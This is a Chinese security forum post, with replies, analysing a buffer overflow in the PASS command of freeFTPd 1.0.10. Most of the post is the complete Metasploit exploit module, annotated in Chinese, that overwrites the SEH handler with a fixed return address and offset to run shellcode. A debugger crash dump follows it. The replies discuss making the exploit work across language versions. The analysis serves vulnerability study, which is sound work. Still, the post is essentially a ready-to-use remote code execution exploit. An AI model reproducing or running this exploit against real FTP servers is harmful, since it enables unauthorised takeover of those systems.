首页
社区
课程
招聘
[原创]freeftpd 1.10.0 PASS Command Buffer Overflow Analysis
发表于: 2013-11-30 23:16 4153

[原创]freeftpd 1.10.0 PASS Command Buffer Overflow Analysis

2013-11-30 23:16
4153

标 题: 【原创】freeftpd 1.10.0 PASS Command Buffer Overflow Analysis
作 者: mpr0xy
时 间: 2013-11-30, 23:16:46
链 接: http://bbs.pediy.com/showthread.php?t=182049

菜鸟贴,欢迎拍砖。
后面有三个问题,没有解决。



漏洞利用程序公布页面,上面可以下载exp和出现漏洞的程序。
http://www.exploit-db.com/exploits/28681/



exp是基于metasploit的,易于阅读。如下,加入了自己的理解(见#号后面的中文注释)

##  
    # This file is part of the Metasploit Framework and may be subject to  
    # redistribution and commercial restrictions. Please see the Metasploit  
    # Framework web site for more information on licensing and terms of use.  
    #   http://metasploit.com/framework/  
    ##  
       
    require 'msf/core'  
       
    class Metasploit3 < Msf::Exploit::Remote  
      Rank = NormalRanking  
       
      include Msf::Exploit::Remote::Ftp  
       
      def initialize(info={})  
        super(update_info(info,  
          'Name'           => "freeFTPd PASS Command Buffer Overflow",  
          'Description'    => %q{  
            freeFTPd 1.0.10 and below contains an overflow condition that is triggered as  
            user-supplied input is not properly validated when handling a specially crafted  
            PASS command. This may allow a remote attacker to cause a buffer overflow,  
            resulting in a denial of service or allow the execution of arbitrary code.  
       
            FreeFTPd must have an account set to authorization anonymous user account.#这句话的意思是FTP必须有匿名验证的帐号,程序默认用的帐户名是anonymous  
          },  
          'License'        => MSF_LICENSE,  
          'Author'         =>  
            [  
              'Wireghoul', # Initial discovery, PoC  
              'TecR0c <roccogiovannicalvi[at]gmail.com>', # Metasploit module  
            ],  
          'References'     =>  
            [  
              ['OSVDB', '96517'],  
              ['EDB',   '27747'],  
              ['BID',   '61905']  
            ],  
          'Payload'        =>  
            {  
              'BadChars'   => "\x00\x0a\x0d",  
            },  
          'Platform'       => 'win',  
          'Arch'           => ARCH_X86,  
          'Targets'        =>  
            [  
              ['freeFTPd 1.0.10 and below on Windows Desktop Version',  
                {  
                  'Ret'    => 0x004014bb, #用这个地址覆盖了最近的SEH地址# pop edi # pop esi # ret 0x04 [FreeFTPDService.exe]  
                  'Offset' => 801,  
                }  
              ],  
            ],  
          'Privileged'     => false,  
          'DisclosureDate' => "Aug 20 2013",  
          'DefaultTarget'  => 0))  
       
        register_options([  
          OptString.new('FTPUSER', [ true, 'The username to authenticate with', 'anonymous' ]),  
       
        ], self.class)  
       
        # We're triggering the bug via the PASS command, no point to have pass as configurable  
        # option.  
        deregister_options('FTPPASS')  
       
      end  
       
      def check  
       
        connect  
        disconnect  
       
        # All versions including and above version 1.0 report "220 Hello, I'm freeFTPd 1.0"  
        # when banner grabbing.  
        if banner =~ /freeFTPd 1\.0/  
          return Exploit::CheckCode::Detected  
        else  
          return Exploit::CheckCode::Safe  
       
        end  
      end  
       
      def exploit  
       
        connect  
        print_status("Trying target #{target.name} with user #{user()}...")  
       
        off = target['Offset'] - 9  
       
        bof = payload.encoded  #shellcode
        bof << rand_text(off - payload.encoded.length)  #填充数据
        bof << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + off.to_s).encode_string  #跳到shellcode开头  
        bof << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-5").encode_string #跳到上面一句跳转,用两个跳转是为了对齐,直接用一个jmp长跳转指令超出了4字节  
        bof << rand_text(2) #上面一句跳转指令只有2个字节,这里补两个字节对齐  
        bof << [target.ret].pack('V') #覆盖SEH  
       
        send_user(datastore['FTPUSER'])  
        raw_send("PASS #{bof}\r\n")  
        disconnect  
       
      end  
    end  
       
    =begin  
    (c78.ea4): Access violation - code c0000005 (first chance)  
    First chance exceptions are reported before any exception handling.  
    This exception may be expected and handled.  
    eax=0012b324 ebx=01805f28 ecx=00000019 edx=00000057 esi=4141413d edi=00181e18  
    eip=76c23e8d esp=0012b310 ebp=0012b328 iopl=0         nv up ei pl nz na pe nc  
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206  
    OLEAUT32!SysFreeString+0x55:  
    76c23e8d ff36            push    dword ptr [esi]      ds:0023:4141413d=????????  
       
    FAULTING_IP:  
    OLEAUT32!SysFreeString+55  
    76c23e8d ff36            push    dword ptr [esi]  
       
    EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)  
    ExceptionAddress: 76c23e8d (OLEAUT32!SysFreeString+0x00000055)  
       ExceptionCode: c0000005 (Access violation)  
      ExceptionFlags: 00000000  
    NumberParameters: 2  
       Parameter[0]: 00000000  
       Parameter[1]: 4141413d  
    Attempt to read from address 4141413d  
    =end

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

上传的附件:
收藏
免费 5
支持
分享
最新回复 (4)
雪    币: 1491
活跃值: (985)
能力值: (RANK:860 )
在线值:
发帖
回帖
粉丝
2
中英文不通用就是因为编码问题,
解决办法是找到一个兼容的DLL地址,Unicode格式的,
另外是否可以控制程序走到一个不同的处理流程中,中英文下不同的流程
2013-12-2 09:29
0
雪    币: 310
活跃值: (159)
能力值: ( LV12,RANK:200 )
在线值:
发帖
回帖
粉丝
3
膜拜LS。我的偶像
2013-12-2 11:51
0
雪    币: 1040
活跃值: (1293)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
话说metasploit有没有什么开发文档之类的东西……api介绍啥的
2013-12-2 12:59
0
雪    币: 7
活跃值: (56)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5
metasploit开发看看里面的代码就差不多了。。反正是ruby。。
2013-12-2 13:03
0
游客
登录 | 注册 方可回帖
返回
//